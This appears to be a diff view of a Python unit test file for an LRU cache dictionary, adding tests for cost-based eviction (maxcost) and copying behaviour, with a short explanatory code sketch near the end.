49 49 d['f'] = 'vf'
50 50 self.assertNotIn('e', d)
51 51 self.assertEqual(d['b'], 'vb2')
52 52 self.assertEqual(d['c'], 'vc2')
53 53 self.assertEqual(d['d'], 'vd')
54 54 self.assertEqual(d['f'], 'vf')
55 55
56 56 d.clear()
57 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 58 self.assertNotIn(key, d)
59 59
60 60 def testunfull(self):
61 61 d = util.lrucachedict(4)
62 62 d['a'] = 1
63 63 d['b'] = 2
64 64 d['a']
65 65 d['b']
66 66
67 67 for key in ('a', 'b'):
68 68 self.assertIn(key, d)
69 69
70 70 def testcopypartial(self):
71 71 d = util.lrucachedict(4)
72 72 d.insert('a', 'va', cost=4)
73 73 d.insert('b', 'vb', cost=2)
74 74
75 75 dc = d.copy()
76 76
77 77 self.assertEqual(len(dc), 2)
78 78 self.assertEqual(dc.totalcost, 6)
79 79 for key in ('a', 'b'):
80 80 self.assertIn(key, dc)
81 81 self.assertEqual(dc[key], 'v%s' % key)
82 82
83 83 self.assertEqual(len(d), 2)
84 84 for key in ('a', 'b'):
85 85 self.assertIn(key, d)
86 86 self.assertEqual(d[key], 'v%s' % key)
87 87
88 88 d['c'] = 'vc'
89 89 del d['b']
90 90 self.assertEqual(d.totalcost, 4)
91 91 dc = d.copy()
92 92 self.assertEqual(len(dc), 2)
93 93 self.assertEqual(dc.totalcost, 4)
94 94 for key in ('a', 'c'):
95 95 self.assertIn(key, dc)
96 96 self.assertEqual(dc[key], 'v%s' % key)
97 97
98 98 def testcopyempty(self):
99 99 d = util.lrucachedict(4)
100 100 dc = d.copy()
101 101 self.assertEqual(len(dc), 0)
102 102
103 103 def testcopyfull(self):
104 104 d = util.lrucachedict(4)
105 105 d.insert('a', 'va', cost=42)
106 106 d['b'] = 'vb'
107 107 d['c'] = 'vc'
108 108 d['d'] = 'vd'
109 109
110 110 dc = d.copy()
111 111
112 112 for key in ('a', 'b', 'c', 'd'):
113 113 self.assertIn(key, dc)
114 114 self.assertEqual(dc[key], 'v%s' % key)
115 115
116 116 self.assertEqual(d.totalcost, 42)
117 117 self.assertEqual(dc.totalcost, 42)
118 118
119 119 # 'a' should be dropped because it was least recently used.
120 120 dc['e'] = 've'
121 121 self.assertNotIn('a', dc)
122 122 for key in ('b', 'c', 'd', 'e'):
123 123 self.assertIn(key, dc)
124 124 self.assertEqual(dc[key], 'v%s' % key)
125 125
126 126 self.assertEqual(d.totalcost, 42)
127 127 self.assertEqual(dc.totalcost, 0)
128 128
129 129 # Contents and order of original dict should remain unchanged.
130 130 dc['b'] = 'vb_new'
131 131
132 132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
133 133 for key in ('a', 'b', 'c', 'd'):
134 134 self.assertEqual(d[key], 'v%s' % key)
135 135
136 d = util.lrucachedict(4, maxcost=42)
137 d.insert('a', 'va', cost=5)
138 d.insert('b', 'vb', cost=4)
139 d.insert('c', 'vc', cost=3)
140 dc = d.copy()
141 self.assertEqual(dc.maxcost, 42)
142 self.assertEqual(len(dc), 3)
143
144 # Max cost can be lowered as part of copy.
145 dc = d.copy(maxcost=10)
146 self.assertEqual(dc.maxcost, 10)
147 self.assertEqual(len(dc), 2)
148 self.assertEqual(dc.totalcost, 7)
149 self.assertIn('b', dc)
150 self.assertIn('c', dc)
151
136 152 def testcopydecreasecapacity(self):
137 153 d = util.lrucachedict(5)
138 154 d.insert('a', 'va', cost=4)
139 155 d.insert('b', 'vb', cost=2)
140 156 d['c'] = 'vc'
141 157 d['d'] = 'vd'
142 158
143 159 dc = d.copy(2)
144 160 self.assertEqual(dc.totalcost, 0)
145 161 for key in ('a', 'b'):
146 162 self.assertNotIn(key, dc)
147 163 for key in ('c', 'd'):
148 164 self.assertIn(key, dc)
149 165 self.assertEqual(dc[key], 'v%s' % key)
150 166
151 167 dc.insert('e', 've', cost=7)
152 168 self.assertEqual(dc.totalcost, 7)
153 169 self.assertNotIn('c', dc)
154 170 for key in ('d', 'e'):
155 171 self.assertIn(key, dc)
156 172 self.assertEqual(dc[key], 'v%s' % key)
157 173
158 174 # Original should remain unchanged.
159 175 self.assertEqual(d.totalcost, 6)
160 176 for key in ('a', 'b', 'c', 'd'):
161 177 self.assertIn(key, d)
162 178 self.assertEqual(d[key], 'v%s' % key)
163 179
164 180 def testcopyincreasecapacity(self):
165 181 d = util.lrucachedict(5)
166 182 d['a'] = 'va'
167 183 d['b'] = 'vb'
168 184 d['c'] = 'vc'
169 185 d['d'] = 'vd'
170 186
171 187 dc = d.copy(6)
172 188 for key in ('a', 'b', 'c', 'd'):
173 189 self.assertIn(key, dc)
174 190 self.assertEqual(dc[key], 'v%s' % key)
175 191
176 192 dc['e'] = 've'
177 193 dc['f'] = 'vf'
178 194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
179 195 self.assertIn(key, dc)
180 196 self.assertEqual(dc[key], 'v%s' % key)
181 197
182 198 dc['g'] = 'vg'
183 199 self.assertNotIn('a', dc)
184 200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
185 201 self.assertIn(key, dc)
186 202 self.assertEqual(dc[key], 'v%s' % key)
187 203
188 204 # Original should remain unchanged.
189 205 for key in ('a', 'b', 'c', 'd'):
190 206 self.assertIn(key, d)
191 207 self.assertEqual(d[key], 'v%s' % key)
192 208
193 209 def testpopoldest(self):
194 210 d = util.lrucachedict(4)
195 211 d.insert('a', 'va', cost=10)
196 212 d.insert('b', 'vb', cost=5)
197 213
198 214 self.assertEqual(len(d), 2)
199 215 self.assertEqual(d.popoldest(), ('a', 'va'))
200 216 self.assertEqual(len(d), 1)
201 217 self.assertEqual(d.totalcost, 5)
202 218 self.assertEqual(d.popoldest(), ('b', 'vb'))
203 219 self.assertEqual(len(d), 0)
204 220 self.assertEqual(d.totalcost, 0)
205 221 self.assertIsNone(d.popoldest())
206 222
207 223 d['a'] = 'va'
208 224 d['b'] = 'vb'
209 225 d['c'] = 'vc'
210 226 d['d'] = 'vd'
211 227
212 228 self.assertEqual(d.popoldest(), ('a', 'va'))
213 229 self.assertEqual(len(d), 3)
214 230 for key in ('b', 'c', 'd'):
215 231 self.assertEqual(d[key], 'v%s' % key)
216 232
217 233 d['a'] = 'va'
218 234 self.assertEqual(d.popoldest(), ('b', 'vb'))
219 235
236 def testmaxcost(self):
237 # Item cost is zero by default.
238 d = util.lrucachedict(6, maxcost=10)
239 d['a'] = 'va'
240 d['b'] = 'vb'
241 d['c'] = 'vc'
242 d['d'] = 'vd'
243 self.assertEqual(len(d), 4)
244 self.assertEqual(d.totalcost, 0)
245
246 d.clear()
247
248 # Insertion to exact cost threshold works without eviction.
249 d.insert('a', 'va', cost=6)
250 d.insert('b', 'vb', cost=4)
251
252 self.assertEqual(len(d), 2)
253 self.assertEqual(d['a'], 'va')
254 self.assertEqual(d['b'], 'vb')
255
256 # Inserting a new element with 0 cost works.
257 d['c'] = 'vc'
258 self.assertEqual(len(d), 3)
259
260 # Inserting a new element with cost putting us above high
261 # water mark evicts oldest single item.
262 d.insert('d', 'vd', cost=1)
263 self.assertEqual(len(d), 3)
264 self.assertEqual(d.totalcost, 5)
265 self.assertNotIn('a', d)
266 for key in ('b', 'c', 'd'):
267 self.assertEqual(d[key], 'v%s' % key)
268
269 # Inserting a new element with enough room for just itself
270 # evicts all items before.
271 d.insert('e', 've', cost=10)
272 self.assertEqual(len(d), 1)
273 self.assertEqual(d.totalcost, 10)
274 self.assertIn('e', d)
275
276 # Inserting a new element with cost greater than threshold
277 # still retains that item.
278 d.insert('f', 'vf', cost=11)
279 self.assertEqual(len(d), 1)
280 self.assertEqual(d.totalcost, 11)
281 self.assertIn('f', d)
282
283 # Inserting a new element will evict the last item since it is
284 # too large.
285 d['g'] = 'vg'
286 self.assertEqual(len(d), 1)
287 self.assertEqual(d.totalcost, 0)
288 self.assertIn('g', d)
289
290 d.clear()
291
292 d.insert('a', 'va', cost=7)
293 d.insert('b', 'vb', cost=3)
294 self.assertEqual(len(d), 2)
295
296 # Replacing a value with smaller cost won't result in eviction.
297 d.insert('b', 'vb2', cost=2)
298 self.assertEqual(len(d), 2)
299
300 # Replacing a value with a higher cost will evict when threshold
301 # exceeded.
302 d.insert('b', 'vb3', cost=4)
303 self.assertEqual(len(d), 1)
304 self.assertNotIn('a', d)
305
306 def testmaxcostcomplex(self):
307 d = util.lrucachedict(100, maxcost=100)
308 d.insert('a', 'va', cost=9)
309 d.insert('b', 'vb', cost=21)
310 d.insert('c', 'vc', cost=7)
311 d.insert('d', 'vc', cost=50)
312 self.assertEqual(d.totalcost, 87)
313
314 # Inserting new element should free multiple elements so we hit
315 # low water mark.
316 d.insert('e', 'vd', cost=25)
317 self.assertEqual(len(d), 3)
318 self.assertNotIn('a', d)
319 self.assertNotIn('b', d)
320 self.assertIn('c', d)
321 self.assertIn('d', d)
322 self.assertIn('e', d)
323
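A condensed sketch of the behavior these tests exercise: inserts are admitted up to ``maxcost``, and crossing the threshold evicts from the oldest end until the budget is met again:

    d = util.lrucachedict(4, maxcost=10)
    d.insert('a', 'va', cost=6)
    d.insert('b', 'vb', cost=4)   # totalcost == 10: at the limit, no eviction
    d.insert('c', 'vc', cost=1)   # over budget: oldest entry 'a' is evicted
    assert 'a' not in d and d.totalcost == 5
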
220 324 if __name__ == '__main__':
221 325 silenttestrunner.main(__name__)